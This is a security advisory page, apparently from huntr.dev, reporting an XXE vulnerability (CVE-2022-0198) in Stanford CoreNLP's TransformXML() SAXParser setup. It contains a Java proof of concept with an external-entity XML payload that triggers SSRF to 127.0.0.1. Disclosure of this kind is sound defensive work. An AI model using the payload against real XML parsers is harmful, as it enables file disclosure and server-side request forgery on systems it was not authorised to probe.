Lucene search
Haxatron3D7E70FE-DDDD-4B79-AF62-8E058C4D5763HistoryJan 11, 2022 - 5:14 a.m.
in stanfordnlp/corenlp
2022-01-1105:14:33
haxatron
www.huntr.dev
9
xxe attacks
saxparser
ssrf
vulnerability
EPSS
0.001
Percentile
33.4%
Description
The TransformXML() function makes use of SAXParser generated from a SAXParserFactory with no FEATURE_SECURE_PROCESSING set, allowing for XXE attacks. In
try {
saxParser = SAXParserFactory.newInstance().newSAXParser();
} catch (Exception e) {
log.info("Error configuring XML parser: " + e);
throw new RuntimeException(e);
}
SAXParser is created without FEATURE_SECURE_PROCESSING set, leaving it vulnerable to XXE
Proof of Concept
Extracted out the key function SAXParser saxParser = SAXParserFactory.newInstance().newSAXParser(), to showcase how it can be exploited.
import javax.xml.parsers.SAXParser;
import javax.xml.parsers.SAXParserFactory;
import org.xml.sax.HandlerBase;
import java.io.ByteArrayInputStream;
public class Poc {
public static void main(String[] args) {
try {
String xmlpoc = "<?xml version=\"1.0\"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM \"http://127.0.0.1/\">]><foo>&xxe;</foo>";
SAXParser saxParser = SAXParserFactory.newInstance().newSAXParser();
saxParser.parse(new ByteArrayInputStream(xmlpoc.getBytes()), new HandlerBase());
} catch (Exception e) {
e.printStackTrace();
}
}
}
Causes an SSRF to http://127.0.0.1
Impact
This vulnerability is capable of XXE to disclose data / conduct SSRF attacks etc.
Related
github
github
XML External Entity Reference in edu.stanford.nlp:stanford-corenlp
2022-01-14 21:07:23
nvd
nvd
CVE-2022-0198
2022-01-13 07:15:06
prion
prion
Xxe
2022-01-13 07:15:00
cvelist
cvelist
veracode
veracode
XML External Entity (XXE)
2022-01-14 05:53:10
osv
osv
XML External Entity Reference in edu.stanford.nlp:stanford-corenlp
2022-01-14 21:07:23
cve
cve
CVE-2022-0198
2022-01-13 07:15:06
